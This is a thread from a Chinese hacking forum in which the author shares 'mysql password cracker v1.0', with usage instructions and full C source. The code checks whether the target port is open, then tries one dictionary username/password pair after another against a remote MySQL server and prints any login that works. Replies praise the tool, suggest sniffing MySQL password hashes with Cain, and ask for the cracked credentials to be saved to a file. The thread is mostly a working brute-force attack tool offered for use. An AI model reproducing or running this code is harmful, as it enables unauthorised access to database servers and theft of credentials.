[原创]mysql password cracker v 1.0
[信息来源]邪恶八进制信息安全团队[文章作者] zhouzhen[E.S.T]
mysql password crack v 1.0
[email]zhouzhen@gmail.com[/email] [url]http://zhouzhen.eviloctal.org[/url]
usage : mysql_pwd_crack [ip] [options]
options:
-u username specify the username of mysql
-x port specify the port of mysql
-p password specify the password of mysql
-d dict specify the dictionary
-a automode automatic crack the mysql password
Note: when u use the -a option, named the username dict user.dic
password dict pass.dic
example: mysql_pwd_crack 127.0.0.1 -x 3306 -u root -d passdict.txt
mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt
mysql_pwd_crack 127.0.0.1 -x 3306 -a
[attach]9798[/attach] 爆破是没办法的办法,一般来说效果不怎么样
最好还是sniff的密码 获取到一些资料的时候 做个小字典跑下也是可行的。
不支持 用户名 和 密码同时使用字典?
我看参数里似乎没有。
-a 原来这个参数就是了。 看漏了。顶LZ一下 顶上! 刚好有用! 有错再报上!
3楼的说mysql可以嗅能提供一下吗! 听说嗅出来的都是HASH 嗅探应该可以嗅探出来的
具体是不是HASH就不知道了,没有试过
不错破解需要一些运气在里面
不过楼主是在强
支持一下 cain能嗅mysql,嗅到的的确是hash ,再用工具跑吧 开源代码 [url]http://www.xfocus.net/tools/200612/1204.html[/url]
[code]
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include "mysql.h"
#pragma comment(lib, "Ws2_32.lib")
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
void usage(){
printf("mysql password crack v 1.0\n");
printf("\t [email]zhouzhen@gmail.com[/email] [url]http://zhouzhen.eviloctal.org[/url]\n\n");
fprintf(stderr,"usage : mysql_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-u username specify the username of mysql\n"
"\t-x port specify the port of mysql\n"
"\t-p password specify the password of mysql\n"
"\t-d dict specify the dictionary\n"
"\t-a automode automatic crack the mysql password \n"
"\tNote: when u use the -a option, named the username dict user.dic\n"
"\t password dict pass.dic\n"
);
printf("\nexample: mysql_pwd_crack 127.0.0.1 -x 3306 -u root -d passdict.txt\n");
printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt\n");
printf("\t mysql_pwd_crack 127.0.0.1 -x 3306 -a\n");
exit(1);
}
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempPass = NULL;
PassInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (PassInfo *) malloc(sizeof(PassInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempPass = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempPass, 100);
if ( (s = (PassInfo *)malloc(sizeof(PassInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->password, '\0', 100);
fgets(szTempPass, 100, DictFile);
strncpy(s->password, szTempPass, strlen(szTempPass)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempPass);
}
return h;
}
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
/* read data from password dictionary, init the link */
TCHAR * szTempName = NULL;
NameInfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/
if ( (h = (NameInfo *) malloc(sizeof(NameInfo))) == NULL )
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
} /* create the head node */
/* init the head node*/
h->Next = NULL;
p = h;
for ( i=0; i < NodeNum; i ++)
{
szTempName = (TCHAR *)calloc(100, sizeof(TCHAR));
ZeroMemory(szTempName, 100);
if ( (s = (NameInfo *)malloc(sizeof(NameInfo))) == NULL)
{
fprintf(stderr, "malloc failed %d", GetLastError());
exit(0);
}
memset(s->Name, '\0', 100);
fgets(szTempName, 100, DictFile);
strncpy(s->Name, szTempName, strlen(szTempName)-1);
s->Next =NULL;
p->Next = s;
p = s;
free(szTempName);
}
return h;
}
int LineCount(FILE * fd)
{
int countline = 0;
char data[100] = {0};
while ( fgets(data, 100, fd) )
countline++;
rewind(fd);
return countline;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd;
ULONG value = 1;
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d. ",WSAGetLastError());
return(0);
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
/* Tell the user that we couldn't find a useable */
/* winsock.dll. */
WSACleanup();
return(0);
}
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return(0);
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 5;
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd, &writefd);
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
recv = select(fd+1, NULL, &writefd, NULL, &timer4);
if( recv > 0 ) Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5)
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-a") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("Can't connect to %s:%d", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stderr, "Can't open the password dictionary\n");
exit(0);
}
passcount = LineCount(passdic);
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
while(curr != NULL)
{
printf("Now cracking %s %s \n", argv[5], curr->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], argv[5], curr->password, "mysql", atoi(argv[3]), NULL, 0) )
printf("\nSuccessfully --> username %s password %s \n", argv[5], curr->password);
curr = curr->Next;
Sleep(100);
} /* starting crack the mysql password*/
fclose(passdic);
free(head);
}
///////////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the password
//////////////////////////////////////////////////////////////////////////////////////////////////
if ( !strcmpi(argv[4], "-p"))
{
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[7], "r")) ==NULL){
fprintf(stderr, "Can't open the name dictionary\n");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);
headnode = Create_Name_link(namecount, Namedict); /* create user link */
currnode = headnode->Next;
while (currnode != NULL)
{
printf("Now cracking %s %s \n", currnode->Name, argv[5]);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currnode->Name, argv[5], "mysql", atoi(argv[3]), NULL, 0) )
printf("\nSuccessfully --> username %s password %s \n", currnode->Name, argv[5]);
currnode = currnode->Next;
Sleep(100);
}
fclose(Namedict);
free(currnode);
}
////////////////////////////////////////////////////////////////////////////////////////////////
// automatic mdoe
////////////////////////////////////////////////////////////////////////////////////////////////
if ( !strcmpi(argv[4], "-a"))
{
FILE * usernamedict = NULL, *passwordict = NULL;
int nameline = 0, passline = 0;
NameInfo * namehead, * currname = NULL;
PassInfo * passhead, * currpass = NULL;
/* open the user.dic */
if ( (usernamedict = fopen("user.dic", "r")) ==NULL){
fprintf(stderr, "Can't open the user.dic file.\n");
exit(0);
}
/* open the pass.dic */
if ( (passwordict = fopen("pass.dic", "r")) ==NULL){
fprintf(stderr, "Can't open the user.dic file.\n");
exit(0);
}
/* count the line of the files */
nameline = LineCount(usernamedict);
passline = LineCount(passwordict);
namehead = Create_Name_link(nameline, usernamedict);
passhead = Create_Pass_link(passline, passwordict);
/* starting crack mysql password*/
currname = namehead->Next;
currpass = passhead->Next;
while (currname != NULL)
{
while(currpass != NULL)
{
printf("Now cracking %s %s \n", currname->Name, currpass->password);
fflush(NULL);
if ( sock = mysql_real_connect(&mysql, argv[1], currname->Name, currpass->password, "mysql", atoi(argv[3]), NULL, 0) )
printf("\nSuccessfully --> username %s password %s \n", currname->Name, currpass->password);
currpass = currpass->Next;
Sleep(100);
}
currpass = passhead->Next;
currname = currname->Next;
}
fclose(usernamedict);
fclose(passwordict);
free(namehead);
free(passhead);
}
mysql_close(sock);
return 0;
}
[/code] 这个程序能不能自动把破解出来的帐号和密码导出到文件里面啊 不然就算破解出来了也看不到的啊
页:
[1]